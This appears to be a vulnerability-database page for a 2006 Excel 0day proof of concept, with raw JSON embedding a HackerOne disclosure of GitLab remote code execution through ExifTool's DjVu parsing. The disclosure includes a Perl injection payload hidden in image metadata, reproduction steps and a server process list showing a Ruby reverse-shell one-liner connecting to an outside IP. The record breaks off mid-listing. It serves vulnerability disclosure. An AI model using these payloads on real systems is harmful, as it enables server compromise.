Search...

Excel 0day : Excel 2000/XP/2003 Style 0day POC

2006-07-03T00:00:00

ID SECURITYVULNS:DOC:13396
Type securityvulns
Reporter Securityvulns
Modified 2006-07-03T00:00:00

Description

Excel 0day : Excel 2000/XP/2003 Style 0day POC

POC http://www.hitcon.org/Nanika.xls

Description: A vulnerability has been discovered in Microsoft Excel, which can be exploited by malicious people to compromise a user's system.

Excel 2003 & XP EIP-> 00xx00xx Click Repair Mode .......Exploit....:P

Excel 2000 Click Style EIP-> xxxxxxxx

http://hitcon.org/index.htm

JSON Vulners Source

Initial Source

{"id": "SECURITYVULNS:DOC:13396", "bulletinFamily": "software", "title": "Excel 0day : Excel 2000/XP/2003 Style 0day POC", "description": "Excel 0day : Excel 2000/XP/2003 Style 0day POC\r\n\r\nPOC\r\nhttp://www.hitcon.org/Nanika.xls\r\n\r\nDescription:\r\nA vulnerability has been discovered in Microsoft Excel, which can be\r\nexploited by malicious people to compromise a user's system.\r\n\r\n\r\n\r\nExcel 2003 & XP \r\nEIP-> 00xx00xx\r\nClick Repair Mode .......Exploit....:P\r\n\r\n\r\nExcel 2000\r\nClick Style\r\nEIP-> xxxxxxxx\r\n\r\n\r\n\r\nhttp://hitcon.org/index.htm\r\n", "published": "2006-07-03T00:00:00", "modified": "2006-07-03T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:13396", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:18", "edition": 1, "viewCount": 74, "enchantments": {"score": {"value": 3.2, "vector": "NONE", "modified": "2018-08-31T11:10:18", "rev": 2}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:F3563336B135A1D7C1251AE54FDC6286"]}, {"type": "nessus", "idList": ["EULEROS_SA-2020-1318.NASL", "EULEROS_SA-2020-1323.NASL", "FREEBSD_PKG_090763F6703011EA93DD080027846A02.NASL", "EULEROS_SA-2020-1314.NASL", "DEBIAN_DLA-2164.NASL", "FREEBSD_PKG_40194E1C6D8911EA808280EE73419AF3.NASL", "EULEROS_SA-2020-1299.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562311220201314", "OPENVAS:1361412562311220201299", "OPENVAS:1361412562311220201323", "OPENVAS:1361412562311220201318", "OPENVAS:1361412562310892164"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2164-1:52F3C"]}, {"type": "zdt", "idList": ["1337DAY-ID-34159", "1337DAY-ID-34153", "1337DAY-ID-34157", "1337DAY-ID-34144", "1337DAY-ID-34134"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:10149"]}], "modified": "2018-08-31T11:10:18", "rev": 2}, "vulnersScore": 3.2}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}}

{"hackerone": [{"id": "H1:1154542", "hash": "5a87b9e007ccc317814a8a2832fd508d", "type": "hackerone", "bulletinFamily": "bugbounty", "title": "GitLab: RCE when removing metadata with ExifTool", "description": "### Summary\n\nWhen uploading image files, GitLab Workhorse passes any files with the extensions jpg|jpeg|tiff through to ExifTool to remove any non-whitelisted tags.\n\nAn issue with this is that ExifTool will ignore the file extension and try to determine what the file is based on the content, allowing for any of the supported parsers to be hit instead of just JPEG and TIFF by just renaming the uploaded file.\n\nOne of the supported formats is DjVu. When parsing the DjVu annotation, the tokens are evaled to "convert C escape sequences". \n\nThere is some validation to try and ensure that everything is properly escaped, but a backslash followed by a newline is correctly handled allowing the quotes to be closed and arbitrary perl inserted and evaluated:\n \n \n (metadata\n (Copyright \"\\\n \" . qx{echo vakzz >/tmp/vakzz} . \\\n \" b \") )\n \n\necho_vakzz.jpg.zip (F1257008) is an example DjVu file with the above metadata, and reverse_shell.jpg.zip (F1257009) is an example that runs a reverse shell.\n\n### Steps to reproduce\n\n 1. Download echo_vakzz.jpg.zip (F1257008) and unzip it\n 2. Create a new snippet\n 3. In the description field, hit "Attach a file"\n 4. Select and uplaod `echo_vakzz.jpg`\n 5. See that the file `/tmp/vakzz` has been created on the server\n\nUploading reverse_shell.jpg.zip (F1257009) to https://gitlab.com/-/snippets/new resulted in a shell on `web-09-sv-gprd`:\n \n \n Connection from [34.74.90.73] port 12345 [tcp/*] accepted (family 2, sport 17073)\n id\n uid=500(git) gid=500(git) groups=500(git)\n hostname -a\n web-09-sv-gprd\n ps auxww\n USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND\n root 1 0.0 0.0 185524 5496 ? Ss 2020 28:31 /sbin/init\n root 2 0.0 0.0 0 0 ? S 2020 1:44 [kthreadd]\n root 4 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/0:0H]\n root 6 0.0 0.0 0 0 ? I< 2020 0:00 [mm_percpu_wq]\n root 7 0.0 0.0 0 0 ? S 2020 22:50 [ksoftirqd/0]\n root 8 0.1 0.0 0 0 ? I 2020 552:25 [rcu_sched]\n root 9 0.0 0.0 0 0 ? I 2020 0:00 [rcu_bh]\n root 10 0.0 0.0 0 0 ? S 2020 1:05 [migration/0]\n root 11 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/0]\n root 12 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/0]\n root 13 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/1]\n root 14 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/1]\n root 15 0.0 0.0 0 0 ? S 2020 1:03 [migration/1]\n root 16 0.0 0.0 0 0 ? S 2020 20:27 [ksoftirqd/1]\n root 18 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/1:0H]\n root 19 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/2]\n root 20 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/2]\n root 21 0.0 0.0 0 0 ? S 2020 1:04 [migration/2]\n root 22 0.0 0.0 0 0 ? S 2020 18:14 [ksoftirqd/2]\n root 24 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/2:0H]\n root 25 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/3]\n root 26 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/3]\n root 27 0.0 0.0 0 0 ? S 2020 1:05 [migration/3]\n root 28 0.0 0.0 0 0 ? S 2020 17:57 [ksoftirqd/3]\n root 30 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/3:0H]\n root 31 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/4]\n root 32 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/4]\n root 33 0.0 0.0 0 0 ? S 2020 1:05 [migration/4]\n root 34 0.0 0.0 0 0 ? S 2020 17:09 [ksoftirqd/4]\n root 36 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/4:0H]\n root 37 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/5]\n root 38 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/5]\n root 39 0.0 0.0 0 0 ? S 2020 1:05 [migration/5]\n root 40 0.0 0.0 0 0 ? S 2020 16:56 [ksoftirqd/5]\n root 42 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/5:0H]\n root 43 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/6]\n root 44 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/6]\n root 45 0.0 0.0 0 0 ? S 2020 1:05 [migration/6]\n root 46 0.0 0.0 0 0 ? S 2020 16:33 [ksoftirqd/6]\n root 48 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/6:0H]\n root 49 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/7]\n root 50 0.0 0.0 0 0 ? S 2020 1:06 [watchdog/7]\n root 51 0.0 0.0 0 0 ? S 2020 1:05 [migration/7]\n root 52 0.0 0.0 0 0 ? S 2020 16:25 [ksoftirqd/7]\n root 54 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/7:0H]\n root 55 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/8]\n root 56 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/8]\n root 57 0.0 0.0 0 0 ? S 2020 1:06 [migration/8]\n root 58 0.0 0.0 0 0 ? S 2020 16:22 [ksoftirqd/8]\n root 60 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/8:0H]\n root 61 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/9]\n root 62 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/9]\n root 63 0.0 0.0 0 0 ? S 2020 1:05 [migration/9]\n root 64 0.0 0.0 0 0 ? S 2020 15:52 [ksoftirqd/9]\n root 66 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/9:0H]\n root 67 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/10]\n root 68 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/10]\n root 69 0.0 0.0 0 0 ? S 2020 1:06 [migration/10]\n root 70 0.0 0.0 0 0 ? S 2020 16:10 [ksoftirqd/10]\n root 72 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/10:0H]\n root 73 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/11]\n root 74 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/11]\n root 75 0.0 0.0 0 0 ? S 2020 1:06 [migration/11]\n root 76 0.0 0.0 0 0 ? S 2020 16:08 [ksoftirqd/11]\n root 78 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/11:0H]\n root 79 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/12]\n root 80 0.0 0.0 0 0 ? S 2020 1:09 [watchdog/12]\n root 81 0.0 0.0 0 0 ? S 2020 1:03 [migration/12]\n root 82 0.0 0.0 0 0 ? S 2020 17:07 [ksoftirqd/12]\n root 84 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/12:0H]\n root 85 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/13]\n root 86 0.0 0.0 0 0 ? S 2020 1:06 [watchdog/13]\n root 87 0.0 0.0 0 0 ? S 2020 1:06 [migration/13]\n root 88 0.0 0.0 0 0 ? S 2020 16:45 [ksoftirqd/13]\n root 90 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/13:0H]\n root 91 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/14]\n root 92 0.0 0.0 0 0 ? S 2020 1:04 [watchdog/14]\n root 93 0.0 0.0 0 0 ? S 2020 1:05 [migration/14]\n root 94 0.0 0.0 0 0 ? S 2020 16:27 [ksoftirqd/14]\n root 96 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/14:0H]\n root 97 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/15]\n root 98 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/15]\n root 99 0.0 0.0 0 0 ? S 2020 1:07 [migration/15]\n root 100 0.0 0.0 0 0 ? S 2020 16:35 [ksoftirqd/15]\n root 102 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/15:0H]\n root 103 0.0 0.0 0 0 ? S 2020 0:00 [kdevtmpfs]\n root 104 0.0 0.0 0 0 ? I< 2020 0:00 [netns]\n root 105 0.0 0.0 0 0 ? S 2020 0:00 [rcu_tasks_kthre]\n root 106 0.0 0.0 0 0 ? S 2020 0:00 [kauditd]\n root 110 0.0 0.0 0 0 ? S 2020 0:33 [khungtaskd]\n root 111 0.0 0.0 0 0 ? S 2020 0:11 [oom_reaper]\n root 112 0.0 0.0 0 0 ? I< 2020 0:00 [writeback]\n root 113 0.0 0.0 0 0 ? S 2020 0:51 [kcompactd0]\n root 114 0.0 0.0 0 0 ? SN 2020 0:00 [ksmd]\n root 115 0.0 0.0 0 0 ? SN 2020 3:10 [khugepaged]\n root 116 0.0 0.0 0 0 ? I< 2020 0:00 [crypto]\n root 117 0.0 0.0 0 0 ? I< 2020 0:00 [kintegrityd]\n root 118 0.0 0.0 0 0 ? I< 2020 0:00 [kblockd]\n root 119 0.0 0.0 0 0 ? I< 2020 0:00 [ata_sff]\n root 120 0.0 0.0 0 0 ? I< 2020 0:00 [md]\n root 121 0.0 0.0 0 0 ? I< 2020 0:00 [edac-poller]\n root 122 0.0 0.0 0 0 ? I< 2020 0:00 [devfreq_wq]\n root 123 0.0 0.0 0 0 ? I< 2020 0:00 [watchdogd]\n root 127 0.0 0.0 0 0 ? S 2020 76:51 [kswapd0]\n root 128 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/u33:0]\n root 129 0.0 0.0 0 0 ? S 2020 0:00 [ecryptfs-kthrea]\n root 172 0.0 0.0 0 0 ? I< 2020 0:00 [kthrotld]\n root 173 0.0 0.0 0 0 ? I< 2020 0:00 [acpi_thermal_pm]\n root 174 0.0 0.0 0 0 ? S 2020 0:00 [scsi_eh_0]\n root 175 0.0 0.0 0 0 ? I< 2020 0:00 [scsi_tmf_0]\n root 183 0.0 0.0 0 0 ? I< 2020 0:00 [ipv6_addrconf]\n root 195 0.0 0.0 0 0 ? I< 2020 0:00 [kstrp]\n root 212 0.0 0.0 0 0 ? I< 2020 0:00 [charger_manager]\n root 406 0.0 0.0 0 0 ? I< 2020 0:00 [raid5wq]\n root 454 0.0 0.0 0 0 ? S 2020 10:42 [jbd2/sda1-8]\n root 455 0.0 0.0 0 0 ? I< 2020 0:00 [ext4-rsv-conver]\n root 515 0.0 0.0 0 0 ? I< 2020 11:09 [kworker/12:1H]\n root 522 0.0 0.0 0 0 ? I< 2020 0:00 [iscsi_eh]\n root 525 0.0 0.0 0 0 ? I< 2020 0:00 [ib-comp-wq]\n root 526 0.0 0.0 0 0 ? I< 2020 0:00 [ib-comp-unb-wq]\n root 527 0.0 0.0 0 0 ? I< 2020 0:00 [ib_mcast]\n root 528 0.0 0.0 0 0 ? I< 2020 0:00 [ib_nl_sa_wq]\n root 531 0.0 0.0 0 0 ? I< 2020 0:00 [rdma_cm]\n root 542 0.0 0.0 0 0 ? I< 2020 10:56 [kworker/6:1H]\n root 549 0.0 0.0 0 0 ? I< 2020 0:00 [rpciod]\n root 550 0.0 0.0 0 0 ? I< 2020 0:00 [xprtiod]\n root 565 0.0 0.0 102968 824 ? Ss 2020 0:00 /sbin/lvmetad -f\n root 595 0.0 0.0 42604 3368 ? Ss 2020 2:12 /lib/systemd/systemd-udevd\n root 596 0.0 0.0 12204 4680 ? Ss 2020 451:18 /usr/sbin/haveged --Foreground --verbose=1 -w 1024\n root 597 0.0 0.0 97900 38924 ? Ss 2020 113:30 /lib/systemd/systemd-journald\n root 763 0.0 0.0 0 0 ? S 2020 0:00 [hwrng]\n root 798 0.0 0.0 0 0 ? I< 2020 1:33 [kworker/13:1H]\n root 814 0.0 0.0 0 0 ? S 2020 12:32 [jbd2/sdb-8]\n root 815 0.0 0.0 0 0 ? I< 2020 0:00 [ext4-rsv-conver]\n prometh+ 969 0.6 0.0 720896 31292 ? Sl 2020 1997:39 /opt/prometheus/node_exporter/node_exporter --web.listen-address=:9100 --collector.mountstats --collector.nfs --collector.ntp --collector.textfile.directory=/opt/prometheus/node_exporter/metrics --collector.filesystem.ignored-fs-types=^(autofs|binfmt_misc|bpf|cgroup2?|configfs|debugfs|devpts|devtmpfs|fusectl|hugetlbfs|iso9660|mqueue|nfs.*|nsfs|overlay|proc|procfs|pstore|rpc_pipefs|securityfs|selinuxfs|squashfs|sysfs|tracefs)$ --collector.netstat.fields=^(.*_(InErrors|InErrs)|Ip_Forwarding|Ip(6|Ext)_(InOctets|OutOctets)|Icmp6?_(InMsgs|OutMsgs)|TcpExt_(Listen.*|Syncookies.*|TCPSynRetrans)|Tcp_(ActiveOpens|InSegs|OutSegs|OutRsts|PassiveOpens|RetransSegs|CurrEstab)|Udp6?_(InDatagrams|OutDatagrams|NoPorts|RcvbufErrors|SndbufErrors))$\n root 1224 0.0 0.0 0 0 ? I< 2020 1:36 [kworker/10:1H]\n root 1230 0.0 0.0 16124 2920 ? Ss 2020 0:01 /sbin/dhclient -1 -v -pf /run/dhclient.ens4.pid -lf /var/lib/dhcp/dhclient.ens4.leases -I -df /var/lib/dhcp/dhclient6.ens4.leases ens4\n root 1386 0.0 0.0 5220 112 ? Ss 2020 6:09 /sbin/iscsid\n root 1389 0.0 0.0 5720 3512 ? S<Ls 2020 29:44 /sbin/iscsid\n root 1407 0.0 0.0 382660 408 ? Ssl 2020 3:07 /usr/bin/lxcfs /var/lib/lxcfs/\n root 1426 0.0 0.0 27728 2320 ? Ss 2020 3:41 /usr/sbin/cron -f\n syslog 1446 0.0 0.0 256392 2112 ? Ssl 2020 56:37 /usr/sbin/rsyslogd -n\n root 1476 0.0 0.0 28628 2648 ? Ss 2020 0:51 /lib/systemd/systemd-logind\n root 1512 0.0 0.0 4396 1208 ? Ss 2020 0:00 /usr/sbin/acpid\n daemon 1525 0.0 0.0 26044 1464 ? Ss 2020 0:00 /usr/sbin/atd -f\n postfix 1570 0.0 0.0 67476 4488 ? S 12:40 0:00 pickup -l -t fifo -u\n root 1593 0.0 0.0 4392 904 ? Ss 2020 7:41 runsvdir -P /etc/service log: /process HTTP/1.1\" 200 153 - -> /process 10.219.1.10 - - [07/Apr/2021:13:13:54 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.9 - - [07/Apr/2021:13:13:58 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.10 - - [07/Apr/2021:13:14:09 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.9 - - [07/Apr/2021:13:14:13 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process\n git 1594 50.1 2.0 2843912 1351680 ? Sl 12:40 17:00 puma: cluster worker 0: 7369 [gitlab-puma-worker]\n message+ 1599 0.0 0.0 43028 3356 ? Ss 2020 1:36 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation\n root 1615 0.0 0.0 4240 1200 ? Ss 2020 0:26 runsv apt_metrics\n root 1617 0.0 0.0 4240 1104 ? Ss 2020 0:03 runsv node_exporter\n root 1618 0.0 0.0 4240 1104 ? Ss 2020 4:24 runsv ntpd_metrics\n root 1620 0.0 0.0 4240 380 ? Ss 2020 0:00 runsv gitlab-monitor\n root 1621 0.0 0.0 4240 388 ? Ss 2020 0:00 runsv mtail\n root 1623 0.0 0.0 0 0 ? I< 2020 15:18 [kworker/0:1H]\n root 1624 0.0 0.0 4384 252 ? S 2020 0:04 svlogd -tt /var/log/mtail\n root 1625 0.0 0.0 4384 380 ? S 2020 0:00 svlogd -tt /var/log/prometheus/node_exporter_apt_metrics\n root 1626 0.0 0.0 4384 224 ? S 2020 0:00 svlogd -tt /var/log/prometheus/node_exporter_ntpd_metrics\n root 1627 0.0 0.0 4384 236 ? S 2020 0:02 svlogd -tt /var/log/prometheus/node_exporter\n root 1628 0.0 0.0 4384 240 ? S 2020 0:00 svlogd -tt /var/log/gitlab-monitor\n root 1713 0.0 0.0 13372 908 ? Ss 2020 0:02 /sbin/mdadm --monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslog\n root 1716 0.0 0.0 0 0 ? I< 2020 0:46 [kworker/14:1H]\n root 1844 0.0 0.0 0 0 ? I< 2020 0:00 [nfsiod]\n root 1850 0.0 0.0 277088 2224 ? Ssl 2020 0:36 /usr/lib/policykit-1/polkitd --no-debug\n root 1878 0.0 0.0 0 0 ? I< 2020 5:54 [kworker/2:1H]\n root 2084 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/6:0]\n root 2095 0.0 0.0 65512 3084 ? Ss 2020 0:04 /usr/sbin/sshd -D\n root 2102 0.0 0.0 0 0 ? I< 2020 2:31 [kworker/9:1H]\n root 2120 0.0 0.0 0 0 ? I< 2020 5:08 [kworker/3:1H]\n root 2138 0.0 0.0 0 0 ? I< 2020 0:31 [kworker/15:1H]\n root 2146 0.0 0.0 0 0 ? I< 2020 23:45 [kworker/1:1H]\n root 2151 0.0 0.0 0 0 ? I< 2020 0:40 [kworker/4:1H]\n root 2167 0.0 0.0 14656 1372 tty1 Ss+ 2020 0:00 /sbin/agetty --noclear tty1 linux\n root 2177 0.0 0.0 14472 1556 ttyS0 Ss+ 2020 0:00 /sbin/agetty --keep-baud 115200 38400 9600 ttyS0 vt220\n ntp 2204 0.0 0.0 40268 2576 ? Ss 2020 21:06 /usr/sbin/ntpd -p /var/run/ntpd.pid -g -c /var/lib/ntp/ntp.conf.dhcp -u 112:116\n root 2270 0.0 0.0 67480 18788 ? Ss 2020 17:03 /usr/bin/python3 /usr/bin/google_ip_forwarding_daemon\n root 2272 0.0 0.0 67220 16368 ? Ss 2020 10:50 /usr/bin/python3 /usr/bin/google_clock_skew_daemon\n root 2402 0.0 0.0 65408 2460 ? Ss 2020 1:05 /usr/lib/postfix/sbin/master\n postfix 2411 0.0 0.0 67640 1988 ? S 2020 0:23 qmgr -l -t fifo -u\n root 2571 0.0 0.0 4392 848 ? Ss 2020 2:50 runsvdir -P /opt/gitlab/service log: ...........................................................................................................................................................................................................................................................................................................................................................................................................\n root 2618 0.0 0.0 4240 1104 ? Ss 2020 0:01 runsv puma\n root 2621 0.0 0.0 4240 1192 ? Ss 2020 0:05 runsv logrotate\n root 2623 0.0 0.0 4240 1144 ? Ss 2020 0:00 runsv nginx\n root 2625 0.0 0.0 4240 1092 ? Ss 2020 0:01 runsv gitlab-workhorse\n gitlab-+ 3150 0.0 0.0 754368 26924 ? Sl Feb17 35:28 /opt/ruby-2.7.0/bin/ruby /opt/gitlab-monitor/bin/gitlab-mon web -c /opt/gitlab-monitor/config/worker-config.yml\n root 3164 0.0 0.0 0 0 ? I< 2020 0:12 [kworker/11:1H]\n root 3211 0.2 0.0 0 0 ? I 12:42 0:04 [kworker/u32:2]\n root 3222 0.0 0.0 0 0 ? I< 2020 0:15 [kworker/7:1H]\n root 3463 0.0 0.0 0 0 ? I 10:35 0:00 [kworker/5:1]\n root 3511 0.0 0.0 0 0 ? I 11:40 0:00 [kworker/12:0]\n root 4032 0.0 0.1 1571276 107596 ? Ssl 2020 172:34 /opt/prometheus/ebpf_exporter/ebpf_exporter --web.listen-address=:9435 --config.file=/opt/prometheus/ebpf_exporter/config.yml\n root 4171 0.0 0.0 4376 640 ? S 13:12 0:00 sleep 600\n root 4302 0.0 0.0 0 0 ? I< 2020 2:25 [kworker/5:1H]\n root 4391 0.0 0.0 0 0 ? I< 2020 0:14 [kworker/8:1H]\n root 4699 0.0 0.0 0 0 ? I 11:09 0:00 [kworker/13:2]\n root 4812 0.0 0.0 4376 672 ? S 13:13 0:00 sleep 60\n root 5375 0.0 0.0 4504 788 ? Ss 13:13 0:00 /bin/sh /opt/gitlab/embedded/bin/gitlab-logrotate-wrapper\n root 5379 0.0 0.0 4376 748 ? S 13:13 0:00 sleep 600\n git 5398 49.7 1.9 2661404 1274712 ? Sl 12:44 14:43 puma: cluster worker 3: 7369 [gitlab-puma-worker]\n git 5544 1.3 0.0 45604 27664 ? S 13:14 0:00 /usr/bin/perl -w /opt/gitlab/embedded/bin/exiftool -all= --IPTC:all --XMP-iptcExt:all -tagsFromFile @ -ResolutionUnit -XResolution -YResolution -YCbCrSubSampling -YCbCrPositioning -BitsPerSample -ImageHeight -ImageWidth -ImageSize -Copyright -CopyrightNotice -Orientation -\n git 5545 0.0 0.0 0 0 ? Z 13:14 0:00 [sh] <defunct>\n git 5551 0.0 0.0 105260 10840 ? S 13:14 0:00 ruby -rsocket -e exit if fork;c=TCPSocket.new(\"103.3.61.137\",12345);while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end\n git 5667 0.0 0.0 4504 740 ? S 13:14 0:00 sh -c ps auxww\n git 5668 0.0 0.0 34424 2864 ? R 13:14 0:00 ps auxww\n root 5952 0.0 0.0 0 0 ? I 00:24 0:00 [kworker/5:2]\n root 6812 0.0 0.0 54640 7080 ? Ss Mar08 0:00 nginx: master process /opt/gitlab/embedded/sbin/nginx -p /var/opt/gitlab/nginx\n gitlab-+ 6813 0.0 0.0 59476 12544 ? S Mar08 18:42 nginx: worker process\n gitlab-+ 6814 0.0 0.0 59380 13704 ? S Mar08 18:28 nginx: worker process\n gitlab-+ 6815 0.0 0.0 59504 13088 ? S Mar08 18:57 nginx: worker process\n gitlab-+ 6816 0.0 0.0 59456 13048 ? S Mar08 19:35 nginx: worker process\n gitlab-+ 6817 0.0 0.0 59468 13396 ? S Mar08 18:41 nginx: worker process\n gitlab-+ 6818 0.0 0.0 59508 13700 ? S Mar08 20:20 nginx: worker process\n gitlab-+ 6819 0.0 0.0 59492 13220 ? S Mar08 19:33 nginx: worker process\n gitlab-+ 6820 0.0 0.0 59460 13420 ? S Mar08 22:00 nginx: worker process\n gitlab-+ 6821 0.0 0.0 59508 13420 ? S Mar08 24:15 nginx: worker process\n gitlab-+ 6822 0.0 0.0 59500 13348 ? S Mar08 20:53 nginx: worker process\n gitlab-+ 6823 0.0 0.0 59660 13588 ? S Mar08 27:47 nginx: worker process\n gitlab-+ 6824 0.0 0.0 59972 14116 ? S Mar08 37:52 nginx: worker process\n gitlab-+ 6825 4.0 0.0 63940 18592 ? S Mar08 1788:21 nginx: worker process\n gitlab-+ 6826 1.9 0.0 61436 15808 ? S Mar08 854:41 nginx: worker process\n gitlab-+ 6827 0.1 0.0 60120 14564 ? S Mar08 79:52 nginx: worker process\n gitlab-+ 6828 0.8 0.0 62348 16532 ? S Mar08 351:59 nginx: worker process\n gitlab-+ 6829 0.0 0.0 54836 3732 ? S Mar08 0:08 nginx: cache manager process\n git 6952 17.6 0.1 1532460 109784 ? Ssl 10:04 33:35 /opt/gitlab/embedded/bin/gitlab-workhorse -listenNetwork unix -listenUmask 0 -listenAddr /var/opt/gitlab/gitlab-workhorse/sockets/socket -authBackend http://localhost:8080 -authSocket /var/opt/gitlab/gitlab-rails/sockets/gitlab.socket -documentRoot /opt/gitlab/embedded/service/gitlab-rails/public -pprofListenAddr -apiLimit 5 -apiQueueDuration 60s -apiQueueLimit 200 -prometheusListenAddr 0.0.0.0:9229 -secretPath /opt/gitlab/embedded/service/gitlab-rails/.gitlab_workhorse_secret -logFormat json -config config.toml\n git 7369 10.3 1.5 1859556 1033020 ? Ssl 10:04 19:41 puma 5.1.1 (unix:///var/opt/gitlab/gitlab-rails/sockets/gitlab.socket,tcp://0.0.0.0:8080) [gitlab-puma-worker]\n root 7522 0.0 0.0 0 0 ? I 10:04 0:00 [kworker/11:2]\n root 8263 0.0 0.0 0 0 ? I 12:15 0:00 [kworker/14:0]\n root 8266 0.0 0.0 0 0 ? I 08:19 0:00 [kworker/0:2]\n root 8581 0.1 0.0 0 0 ? I 12:48 0:02 [kworker/u32:1]\n root 9122 0.0 0.0 0 0 ? I 10:37 0:00 [kworker/8:0]\n git 9978 47.0 2.0 3182348 1362056 ? Sl 11:43 42:45 puma: cluster worker 8: 7369 [gitlab-puma-worker]\n consul 10871 0.5 0.2 257480 143704 ? Ssl 2020 2836:38 /opt/consul/1.7.2/consul agent -config-file=/etc/consul/consul.json -config-dir=/etc/consul/conf.d\n git 10980 51.1 1.8 2507012 1229264 ? Sl 12:49 12:43 puma: cluster worker 2: 7369 [gitlab-puma-worker]\n influxd+ 12182 0.0 0.0 188928 1044 ? Ssl 2020 0:14 /usr/bin/influxdb-relay -config /etc/influxdb-relay/influxdb-relay.conf\n root 12322 0.0 0.0 0 0 ? I 12:49 0:00 [kworker/11:1]\n root 12828 0.0 0.0 4384 1276 ? S 2020 0:01 svlogd -tt /var/log/gitlab/puma\n root 12831 0.2 0.0 4384 1228 ? S 2020 1318:06 svlogd /var/log/gitlab/gitlab-workhorse\n root 12853 0.0 0.0 4384 1260 ? S 2020 0:02 svlogd -tt /var/log/gitlab/nginx\n root 12856 0.0 0.0 4384 340 ? S 2020 0:00 svlogd -tt /var/log/gitlab/logrotate\n git 13196 48.0 2.1 2935068 1437312 ? Sl 12:17 27:28 puma: cluster worker 10: 7369 [gitlab-puma-worker]\n root 13379 0.0 0.0 0 0 ? I 09:53 0:00 [kworker/7:1]\n root 13382 0.0 0.0 0 0 ? I 09:53 0:00 [kworker/10:1]\n root 13611 1.0 0.0 1740892 38864 ? Ssl Jan29 1042:19 /usr/bin/process-exporter --config.path /etc/process-exporter/chef-configured.yaml --web.listen-address=:9256 -threads=false -gather-smaps=false\n root 14478 0.0 0.0 0 0 ? I 09:24 0:00 [kworker/2:0]\n git 17155 50.3 1.8 2541576 1218444 ? Sl 12:50 11:50 puma: cluster worker 15: 7369 [gitlab-puma-worker]\n root 17904 0.0 0.0 0 0 ? I 09:59 0:00 [kworker/2:2]\n git 21109 48.3 1.9 2572804 1258580 ? Sl 12:55 9:17 puma: cluster worker 5: 7369 [gitlab-puma-worker]\n root 21296 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/8:1]\n root 21299 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/1:0]\n root 21301 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/7:0]\n root 21306 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/15:1]\n root 21376 0.0 0.0 0 0 ? I 09:59 0:00 [kworker/9:0]\n git 21698 48.0 2.2 3093788 1459416 ? Sl 12:26 23:00 puma: cluster worker 9: 7369 [gitlab-puma-worker]\n root 22003 0.2 0.0 0 0 ? I 12:26 0:05 [kworker/u32:3]\n root 22131 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/9:2]\n root 22135 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/4:2]\n root 22142 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/12:3]\n root 22143 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/3:1]\n root 22144 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/13:0]\n root 22863 0.0 0.0 161112 54712 ? Ssl Jan18 0:15 /opt/chef/embedded/bin/ruby --disable-gems /usr/bin/chef-client -c /etc/chef/client.rb -i 1800 -s 300\n root 